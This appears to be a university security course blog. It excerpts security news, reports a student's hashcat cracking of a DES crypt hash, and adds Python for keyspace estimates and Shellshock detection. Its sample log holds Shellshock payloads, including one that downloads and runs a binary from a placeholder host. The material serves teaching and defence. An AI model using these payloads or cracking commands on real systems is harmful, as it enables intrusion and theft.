Hacking aircraft: Remote control

How realistic is it for computer hackers to interfere with aircraft while they are in the air, a phenomenon known as cyberjacking? It partly depends on terminology. Hijacking and fully controlling an aircraft by remote means borders on the impossible, according to David Stupples of City University in London, a specialist in communications. But interfering with an aircraft’s systems, including inducing a catastrophic failure, in order to extort money is a distinct possibility, he warns.

There are two ways this could be done, one more likely than the other. The first is a cyber attack from the outside. Passengers increasingly demand internet connectivity for work, games, movies and the like. But drilling holes in fuselages for additional antennae is costly and inefficient. So internet signals are routed through existing communications architecture, such as the Aircraft Communications Addressing and Reporting System (ACARS), which is used for short messages, or the Automatic Dependent Surveillance-Broadcast (ADS-B), an anti-collision system. As these both send and receive information they can, in theory, be targeted. When aircraft become more connected to the wider world they begin to look, electronically at least, like fixed structures. If banks can be hacked, why not aircraft?

via Hacking aircraft: Remote control | The Economist.

Unpatched bug in Mac OS X gives root access to untrusted people

Garrett McCarty from COMP/IT 424 pointed this out:

An unpatched vulnerability in Yosemite and some earlier versions of Apple’s Mac OS X allows untrusted people to take full control of users’ machines, a security researcher has warned.

Dubbed Rootpipe, the privilege escalation bug allows people to gain root access, a nearly unrestricted level of system privileges, without first entering the “sudo” password, according to a recent report published by MacWorld. Sudo is a mechanism that’s designed to prevent code execution, file deletions, and other sensitive operations from being carried out by unauthorized people who have physical access to a computer.

“Normally there are ‘sudo’ password requirements, which work as a barrier, so the admin can’t gain root access without entering the correct password,” Emil Kvarnhammar, a researcher at Swedish security firm Truesec, told Macworld. “It took a few days of binary analysis to find the flaw, and I was pretty surprised when I found it.”

via Unpatched bug in Mac OS X gives root access to untrusted people | Ars Technica.

Stop worrying about mastermind hackers. Start worrying about the IT guy.

Mistakes in setting up popular office software have sent information about millions of Americans spilling onto the Internet, including Social Security numbers of college students, the names of children in Texas and the ID numbers of intelligence officials who visited a port facility in Maryland.

The security problem, researchers say, has affected many hundreds of servers running popular Oracle software, exposing a peculiar melange of data to possible collection by hackers. Most of the institutions affected have been universities or government agencies, though they hold a wide range of information on individuals and private companies.

The UCLA Health system, for example, had communications records — including doctors’ names, e-mail addresses and phone numbers — visible online. The Pentagon’s Defense Information Systems Agency, which maintains secure military networks, exposed a contracting database appearing to show $164 million in purchases. Two Texas state agencies failed to protect the personal details of people receiving government services.

This was not the work of sophisticated Russian hackers or Chinese cyber-warriors, who typically get blamed for problems in computer networks. Instead, researchers are pointing to humble system administrators for making routine errors that left the data unsecured.

via Stop worrying about mastermind hackers. Start worrying about the IT guy. – The Washington Post.

A Few Thoughts on Cryptographic Engineering: Why can’t Apple decrypt your iPhone?

A former student of mine, Kanishka Goel, has pointed out this interesting article:

Last week I wrote about Apple’s new default encryption policy for iOS 8. Since that piece was intended for general audiences, I mostly avoided technical detail. But since some folks (and apparently the Washington Post!) are still wondering how the nitty-gritty details of Apple’s design might work, I thought it might be helpful to sum up what we know and noodle about what we don’t.

To get started, it’s worth pointing out that disk encryption is hardly new with iOS 8. In fact, Apple’s operating system has enabled some form of encryption since before iOS 7. What’s happened in the latest update is that Apple has decided to protect much more of the interesting data on the device under the user’s passcode. This includes photos and text messages — things that were not previously passcode-protected, and which police very much want access to.

via A Few Thoughts on Cryptographic Engineering: Why can’t Apple decrypt your iPhone?.

You can read more about Apple iOS Security here.

DES password challenge in COMP424

The password challenge in COMP/IT 424, the “Security” course that I am currently teaching at Channel Islands, was to find the crypt() password corresponding to the hash:

3zLNGMUzkNwak

The winner of the challenge was Jesse Thomas, here is the password:

h7vy09s1

and here is Jesse’s approach in his own words:

I decided to try ocl hashcat to crack the password. Since we were told that the password would be entropic, I figured we'd have to try a brute force attack. At first I was attempting to use all 94 potential characters but after seeing that it was estimated to take around 10 years to search through them all for a password length of 8 characters, I chose to search for only passwords matching lowercase characters and digits (like the previous challenge shown in class). The attempt took 4 hours and 48 minutes to complete, using a single nVidia GeForce GTX 560 Ti, which ran at a speed of 19739 kH/s (hash calculations/sec). At the time the password was cracked, hashCat had checked 341256962048 of 2821109907456 (32^8) potential combinations, so the password was found relatively early in the search algorithm (about 12% exhausted).

I used this command (in Windows, where I had a stronger video card):

cudaHashcat64.exe -m 1500 -a 3 -o cracked.txt "3zLNGMUzkNwak" -1 ?l?d ?1?1?1?1?1?1?1?1

-m specifies the hash type. 1500 is for descrypt/DES.
-a 3 specifies a brute force attack
"-1 ?l?d" specifies a custom mask with the characteristic of being lowercase and digits only
"?1?1?1?1?1?1?1?1" specifies that there will be 8 characters in the password. Tried after it failed to find anything for length <= 7

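The arithmetic behind Jesse's run is worth reproducing, because it is the whole lesson of the challenge: an 8-character crypt(3)-DES password drawn from lowercase letters and digits is a 36-character alphabet (26 + 10), so the keyspace is 36^8 = 2,821,109,907,456, the figure in his write-up, and at 19,739 kH/s a single 2011-era GPU walks all of it in under 40 hours. The example below is added here and is not part of the course post or of hashcat; it parses hashcat-style masks and custom charsets (-1 ?l?d), computes keyspace and search time for any mask and rate, and shows why mask length beyond 8 is wasted against DES crypt, which keys DES with only the first 8 characters and the low 7 bits of each. The function names are this example's own. Two details that the code makes explicit: hashcat's ?a class is 95 printable characters (space included), slightly more than the 94 quoted above, and hashcat by default walks the mask in Markov order rather than lexicographically, so the "12% exhausted" progress reading at the moment of the hit is a property of that ordering (the same password sits about 22% of the way through a plain lexicographic walk).

```python
"""Added example (not part of the original post or of hashcat): keyspace and
time estimates for hashcat masks, plus the crypt(3)-DES key truncation rule.
Function names are this example's own."""
import string

# hashcat's built-in charset classes; ?a is the union of the other four (95).
CLASSES = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " " + string.punctuation,          # 33 characters, like hashcat's ?s
}
CLASSES["a"] = CLASSES["l"] + CLASSES["u"] + CLASSES["d"] + CLASSES["s"]


def _tokens(spec, custom):
    """Yield one charset string per token of a mask or charset spec.
    ?l ?u ?d ?s ?a are built-ins, ?1..?4 come from `custom` (the -1..-4
    flags), ?? is a literal '?', any other character is a literal."""
    i = 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            key = spec[i + 1]
            if key == "?":
                yield "?"
            elif key in CLASSES:
                yield CLASSES[key]
            elif key in custom:
                yield custom[key]
            else:
                raise ValueError("unknown charset ?%s" % key)
            i += 2
        else:
            yield spec[i]
            i += 1


def expand_charset(spec, custom=None):
    """Characters denoted by a spec such as '?l?d', duplicates removed."""
    return "".join(dict.fromkeys("".join(_tokens(spec, custom or {}))))


def mask_positions(mask, custom=None):
    """One charset per password position, e.g. '?1?1' -> [custom['1']] * 2."""
    return list(_tokens(mask, custom or {}))


def keyspace(mask, custom=None):
    """Number of candidates the mask enumerates (product of position sizes)."""
    n = 1
    for charset in mask_positions(mask, custom):
        n *= len(charset)
    return n


def lexicographic_index(candidate, positions):
    """0-based index of `candidate` if the mask were walked in plain
    lexicographic order (hashcat's default Markov ordering differs)."""
    if len(candidate) != len(positions):
        raise ValueError("candidate length does not match mask")
    idx = 0
    for ch, charset in zip(candidate, positions):
        idx = idx * len(charset) + charset.index(ch)
    return idx


def descrypt_effective_key(password):
    """What crypt(3)-DES actually keys DES with: the first 8 characters only,
    and only the low 7 bits of each. Anything past 8 characters is ignored,
    so the keyspace never exceeds 2**56 and a mask longer than 8 is wasted."""
    return "".join(chr(ord(c) & 0x7F) for c in password[:8])


def challenge_summary(rate_hps=19_739_000, checked=341_256_962_048):
    """Numbers for the COMP/IT 424 run: -1 ?l?d, mask ?1?1?1?1?1?1?1?1,
    19,739 kH/s, 341,256,962,048 candidates checked before the hit."""
    custom = {"1": expand_charset("?l?d")}
    mask = "?1?1?1?1?1?1?1?1"
    space = keyspace(mask, custom)                 # 36**8
    hit = lexicographic_index("h7vy09s1", mask_positions(mask, custom))
    return {
        "keyspace": space,
        "full_search_hours": space / rate_hps / 3600,
        "hours_until_hit": checked / rate_hps / 3600,
        "fraction_exhausted": checked / space,
        "lex_fraction_of_hit": hit / space,
        "all_printable_years": keyspace("?a" * 8) / rate_hps / 3600 / 24 / 365.25,
    }


if __name__ == "__main__":
    for name, value in challenge_summary().items():
        print("%-22s %s" % (name, value))
```

Running it reproduces the 4.8 hours to the hit and the roughly 40 hours for the whole ?l?d space; the ?a line shows why the full printable alphabet was dismissed as a ten-year job. The practical conclusion for anyone still running DES crypt is that the defence is not a better password but a better hash (sha512crypt, bcrypt or scrypt), since 2^56 per salt is the ceiling no matter what users type.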

JPMorgan Discovers Further Cyber Security Issues – NYTimes.com

For the second time in roughly three months, JPMorgan Chase is scrambling to contain the fallout from a security breach of its vast computer network, according to several people with knowledge of the investigation.

JPMorgan, the nation’s largest bank, recently found that hackers, with links to Italy or southern Europe, had gained entry to some of the bank’s servers, these people said. The discovery follows an attack that was uncovered in late July and suggests that it was more extensive than first thought. In that attack, hackers obtained entry to dozens of the bank’s servers and reviewed information on more than one million customer accounts. Security experts briefed on the matter had said that the full extent of the July attack was not known and that it could take the bank months to discover all of the fallout.

via JPMorgan Discovers Further Cyber Security Issues – NYTimes.com.

ShellShock: All you need to know about the Bash Bug vulnerability | Symantec Connect

A new vulnerability has been found that potentially affects most versions of the Linux and Unix operating systems, in addition to Mac OS X which is based around Unix. Known as the “Bash Bug” or “ShellShock,” the GNU Bash Remote Code Execution Vulnerability CVE-2014-6271 could allow an attacker to gain control over a targeted computer if exploited successfully.

The vulnerability affects Bash, a common component known as a shell that appears in many versions of Linux and Unix. Bash acts as a command language interpreter. In other words, it allows the user to type commands into a simple text-based window, which the operating system will then run.

Bash can also be used to run commands passed to it by applications and it is this feature that the vulnerability affects. One type of command that can be sent to Bash allows environment variables to be set. Environment variables are dynamic, named values that affect the way processes are run on a computer. The vulnerability lies in the fact that an attacker can tack-on malicious code to the environment variable, which will run once the variable is received.

Symantec regards this vulnerability as critical, since Bash is widely used in Linux and Unix operating systems running on Internet-connected computers, such as Web servers. Although specific conditions need to be in place for the bug to be exploited, successful exploitation could enable remote code execution. This could not only allow an attacker to steal data from a compromised computer, but enable the attacker to gain control over the computer and potentially provide them with access to other computers on the affected network.

via ShellShock: All you need to know about the Bash Bug vulnerability | Symantec Connect.
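The "specific conditions" Symantec mentions deserve to be spelled out, because they are what turn a parser bug into remote code execution: bash used to import shell functions from any environment variable whose value began with "() {", and the vulnerable versions kept executing whatever followed the function body. Any network-facing program that copies attacker-controlled data into environment variables and then starts bash therefore hands the attacker a command line; the classic case is CGI, where a web server exports request headers such as User-Agent and Referer as HTTP_USER_AGENT and HTTP_REFERER before running the script. The example below is added here and is not part of the Symantec article. It does two things: it runs the widely used local probe (a function-looking variable with a trailing command, executed against whichever bash the machine has) and reports whether that bash is patched, and it scans web-server log lines for the "() {" prefix every exploitation attempt through CGI must carry, pulling out the command the attacker tried to run. The log lines are constructed for this example with RFC 5737 documentation addresses; the function names are this example's own.

```python
"""Added example (not from the Symantec article): a local probe for
CVE-2014-6271 style function-definition injection, and a log scanner for
attempts arriving through CGI request headers. Sample log lines are
constructed for this example."""
import os
import re
import shutil
import subprocess

# The exported-function prefix vulnerable bash looked for: "() {".
# Attackers pad it with whitespace, so allow any amount between the tokens.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Constructed combined-format access log lines (request, referer, user-agent
# quoted). Lines 1, 3 and 4 are attempts; 2 and 5 are benign, and line 5
# carries "()" in the query string without "{" to show it is not flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://198.51.100.9/x; chmod +x x; ./x'"
198.51.100.22 - - [25/Sep/2014:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.8 - - [25/Sep/2014:10:02:11 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 47 "() {:;}; echo Content-Type: text/plain; echo; /usr/bin/id" "curl/7.37.0"
192.0.2.4 - - [25/Sep/2014:10:03:00 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() {   ;}; ping -c 1 198.51.100.9"
192.0.2.5 - - [25/Sep/2014:10:04:00 +0000] "GET /faq?q=what+is+() HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""


def probe_local_bash():
    """Return 'vulnerable', 'patched' or 'unavailable' for this machine's bash.

    A vulnerable bash imports the variable x as a function and then keeps
    executing the text after the closing brace, so 'echo vulnerable' runs
    before the harmless -c command. A fixed bash ignores trailing text and,
    in current versions, only imports functions from specially prefixed
    variable names, so stdout contains just 'probe'."""
    bash = shutil.which("bash")
    if bash is None:
        return "unavailable"
    env = dict(os.environ)
    env["x"] = "() { :;}; echo vulnerable"
    try:
        out = subprocess.run([bash, "-c", "echo probe"], env=env,
                             capture_output=True, text=True, timeout=10).stdout
    except (OSError, subprocess.TimeoutExpired):
        return "unavailable"
    return "vulnerable" if "vulnerable" in out else "patched"


def find_shellshock_attempts(log_text):
    """Return (client_ip, offending_field) for each line whose quoted referer
    or user-agent field carries a bash function-definition prefix. Those two
    headers are the usual carriers because CGI exports them verbatim."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        quoted = re.findall(r'"([^"]*)"', line)   # request, referer, user-agent
        client = line.split(" ", 1)[0]
        for field in quoted[1:]:                   # skip the request line
            if SHELLSHOCK_RE.search(field):
                hits.append((client, field))
                break
    return hits


def injected_command(field):
    """The command bash would have run: everything after the first closing
    brace of the bogus function body, with the separating ';' stripped."""
    m = SHELLSHOCK_RE.search(field)
    if not m:
        return None
    rest = field[m.end():]
    close = rest.find("}")
    if close == -1:
        return None
    return rest[close + 1:].lstrip(" ;").strip()


if __name__ == "__main__":
    print("local bash:", probe_local_bash())
    for ip, field in find_shellshock_attempts(SAMPLE_LOG):
        print(ip, "->", injected_command(field))
```

The scanner is deliberately keyed on the prefix rather than on any particular payload: "() {" has no business in a request header, so every hit is worth a look, and the extracted command tells the responder what to hunt for on the host (a dropped binary in the first sample, an id probe in the second, an outbound ping used as a blind-injection oracle in the third). The probe only tells you about the bash on the machine you run it on; the real exposure question is which services on that machine pass untrusted data into environment variables before spawning a shell.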

Cybersecurity hiring crisis: Rockstars, anger and the billion dollar problem

At no time in history has there been a greater need to hire security professionals to protect and defend infrastructures from an inexhaustible onslaught of organized crime, industrial espionage, and nation-state attacks. A small talent pool, an inflated wage bubble and the high tensions of a virulent attack landscape have made cybersecurity’s hiring crisis the “billion dollar” problem.

via Cybersecurity hiring crisis: Rockstars, anger and the billion dollar problem | ZDNet.